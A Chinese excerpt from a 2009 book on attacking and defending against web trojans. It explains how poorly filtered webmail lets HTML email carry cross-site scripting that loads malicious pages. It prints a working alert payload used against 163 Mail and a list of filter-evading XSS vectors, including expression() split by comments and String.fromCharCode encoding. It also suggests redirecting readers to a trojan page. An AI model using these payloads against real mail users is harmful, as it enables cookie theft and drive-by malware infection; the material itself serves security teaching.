邮件网页木马实例

邮件网页木马实例

 

    邮件网页木马的核心是邮件系统对跨站代码的过滤不全，以HTML方式发送的邮件利用跨站代码引入网页木马。跨站脚本攻击（Cross Site Scripting，缩写为CSS，但这会与层叠样式表（Cascading Style Sheets, CSS）的缩写混淆，所以CSS攻击一般都写成XSS），是指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时，通常会单击其中的链接。攻击者通过在链接中插入恶意代码，就能够盗取用户信息；并且通常会用十六进制（或其他编码方式）链接编码，以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面，而这个页面看起来就好像是那个网站应当生成的合法页面一样。XSS用在邮件中既可以盗取用户的cookie等信息，也可以引入网页木马，现在国内的大部分邮箱，如163、sina、sohu、Tom等都存在跨站代码过滤不严的问题，笔者以163的信箱为例子，给自己发送了一封邮件，编辑邮件的源代码，使用下面的代码：

<img style="start:ex/**/pre/**/ssion(eval(this.xss))"
xss="if(this.height==0)
{;}
else {
this.height=0;
alert('test');
}"
name='ddddd' src="#" height=1 width=0></img>

    打开这封邮件以后，就会弹出一个对话框，如图1.10所示：
 

图1.10 邮件中的跨站代码过滤不严造成的后果
 
    如果把其中的javascript代码改成（top.location=http://网页木马地址）、或者利用js的document.write方法直接写出网页木马，或者插入一个框架，那么，也许就不是仅仅弹出一个对话框这么简单了。其他常用于引入javascript的标签还有：

<XSS STYLE="behavior:url(xss.htc);">
<marquee onstart="alert(/2/)">.</marquee>
<div style="xss:ex/**/pre/**/ssion(alert('xss'))">
<div style=
"xss:ex/**/pre/**/ssion(eval(String.fromCharCode (97,108,101,114,116,40,39,120,115,115,39,41)))">
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<img src="#" style="Xss:expression(alert('xss'));">
<img onmouseover=alert()></img>

    /**/是注释符号，为了躲避过滤expression关键字；除了注释符号，还可以用String.fromCharCode、并通过对其进行二次编码等手段绕过邮件的过滤系统。
 
本文节选自电子工业出版社2009年5月出版的 《网页木马攻防实战》一书。

到当当网购买

到卓越网购买

到china-pub购买

浏览更多精彩文章>>
订阅软件安全电子期刊>>